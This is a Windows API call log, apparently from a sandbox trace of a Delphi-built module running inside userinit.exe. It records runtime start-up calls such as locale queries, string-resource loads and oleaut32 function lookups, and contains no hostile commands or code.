[0180.470] GetStartupInfoA (in: lpStartupInfo=0x6f8c0 | out: lpStartupInfo=0x6f8c0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0180.470] GetVersion () returned 0x1db10106
[0180.470] GetVersion () returned 0x1db10106
[0180.470] GetCurrentThreadId () returned 0x414
[0180.470] GetModuleFileNameA (in: hModule=0x27d0000, lpFilename=0x6f3bc, nSize=0x105 | out: lpFilename="\xcc\xf3\x06" (normalized: "c:\\windows\\system32\\ìó\x06")) returned 0x0
[0180.470] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6f297, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.470] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f3ac | out: phkResult=0x6f3ac*=0x0) returned 0x2
[0180.470] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f3ac | out: phkResult=0x6f3ac*=0x0) returned 0x2
[0180.470] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f3ac | out: phkResult=0x6f3ac*=0x0) returned 0x2
[0180.470] lstrcpynA (in: lpString1=0x6f297, lpString2="\xcc\xf3\x06", iMaxLength=261 | out: lpString1="\xcc\xf3\x06") returned="\xcc\xf3\x06"
[0180.470] GetThreadLocale () returned 0x409
[0180.470] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x6f3a7, cchData=5 | out: lpLCData="ENU") returned 4
[0180.471] lstrlenA (lpString="\xcc\xf3\x06") returned 3
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffc4, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0180.471] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1fdcc0
[0180.471] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x28f0000
[0180.471] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1fecc0
[0180.471] VirtualAlloc (lpAddress=0x28f0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x28f0000
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffc3, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffc1, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffc2, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffd4, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffdd, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffd3, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffd0, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffd7, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffd6, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffe8, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0180.471] LoadStringA (in: hInstance=0x27d0000, uID=0xffe9, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffea, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffe7, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffe5, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffe3, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffe2, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffe1, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffe0, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffff, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfffe, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfffd, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfffc, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfffb, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfffa, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfff9, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfff8, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfff7, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfff6, lpBuffer=0x6f4e0, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xfff4, lpBuffer=0x6f4cc, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0180.472] LoadStringA (in: hInstance=0x27d0000, uID=0xffe4, lpBuffer=0x6f4cc, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0180.472] GetVersionExA (in: lpVersionInformation=0x6f864*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x27d0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<}\x02·\"}\x02üø\x06") | out: lpVersionInformation=0x6f864*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0180.472] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.472] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0180.472] GetThreadLocale () returned 0x409
[0180.472] GetThreadLocale () returned 0x409
[0180.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Jan") returned 4
[0180.472] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x6f73c, cchData=256 | out: lpLCData="January") returned 8
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Feb") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x6f73c, cchData=256 | out: lpLCData="February") returned 9
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Mar") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x6f73c, cchData=256 | out: lpLCData="March") returned 6
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Apr") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x6f73c, cchData=256 | out: lpLCData="April") returned 6
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x6f73c, cchData=256 | out: lpLCData="May") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x6f73c, cchData=256 | out: lpLCData="May") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Jun") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x6f73c, cchData=256 | out: lpLCData="June") returned 5
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Jul") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x6f73c, cchData=256 | out: lpLCData="July") returned 5
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Aug") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x6f73c, cchData=256 | out: lpLCData="August") returned 7
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Sep") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x6f73c, cchData=256 | out: lpLCData="September") returned 10
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Oct") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x6f73c, cchData=256 | out: lpLCData="October") returned 8
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Nov") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x6f73c, cchData=256 | out: lpLCData="November") returned 9
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Dec") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x6f73c, cchData=256 | out: lpLCData="December") returned 9
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Sun") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Sunday") returned 7
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Mon") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Monday") returned 7
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Tue") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Wed") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Thu") returned 4
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Thursday") returned 9
[0180.473] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Fri") returned 4
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Friday") returned 7
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Sat") returned 4
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x6f73c, cchData=256 | out: lpLCData="Saturday") returned 9
[0180.474] GetThreadLocale () returned 0x409
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x6f798, cchData=256 | out: lpLCData="$") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x6f798, cchData=256 | out: lpLCData="0") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x6f798, cchData=256 | out: lpLCData="0") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x6f890, cchData=2 | out: lpLCData=",") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x6f890, cchData=2 | out: lpLCData=".") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x6f798, cchData=256 | out: lpLCData="2") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x6f890, cchData=2 | out: lpLCData="/") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x6f798, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0180.474] GetThreadLocale () returned 0x409
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6f764, cchData=256 | out: lpLCData="1") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x6f798, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0180.474] GetThreadLocale () returned 0x409
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6f764, cchData=256 | out: lpLCData="1") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x6f890, cchData=2 | out: lpLCData=":") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x6f798, cchData=256 | out: lpLCData="AM") returned 3
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x6f798, cchData=256 | out: lpLCData="PM") returned 3
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x6f798, cchData=256 | out: lpLCData="0") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x6f798, cchData=256 | out: lpLCData="0") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x6f798, cchData=256 | out: lpLCData="0") returned 2
[0180.474] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x6f890, cchData=2 | out: lpLCData=",") returned 2
[0180.474] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0180.474] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0180.475] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0180.476] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0180.477] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0180.477] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0180.477] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0180.477] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0180.477] GetDC (hWnd=0x0) returned 0xed010836
[0180.477] GetDeviceCaps (hdc=0xed010836, index=90) returned 96
[0180.477] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.477] GetDC (hWnd=0x0) returned 0xed010836
[0180.477] GetDeviceCaps (hdc=0xed010836, index=104) returned 0
[0180.477] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.477] CreatePalette (plpal=0x6f4f4) returned 0x3408088b
[0180.477] GetStockObject (i=7) returned 0x1b00017
[0180.477] GetStockObject (i=5) returned 0x1900015
[0180.477] GetStockObject (i=13) returned 0x18a002e
[0180.477] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0180.477] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff3d, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff3c, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff3b, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff3a, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff39, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff38, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff37, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff36, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff35, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff34, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff33, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff32, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff31, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff30, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff4f, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff4e, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff4d, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xff4c, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0180.478] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0180.478] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0180.478] GetCurrentThreadId () returned 0x414
[0180.478] GlobalAddAtomA (lpString="WndProcPtr027D000000000414") returned 0xc0fd
[0180.478] LoadStringA (in: hInstance=0x27d0000, uID=0xfefc, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfefb, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfefa, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef9, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef8, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef7, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef6, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef5, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef4, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef3, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef2, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef1, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xfef0, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff0f, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff0e, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff0d, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff0c, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff0b, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff0a, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff09, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff08, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff07, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff06, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff05, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff04, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff03, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff02, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff01, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff00, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff1f, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff1e, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff1d, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff1c, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff1b, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff1a, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff19, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff18, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
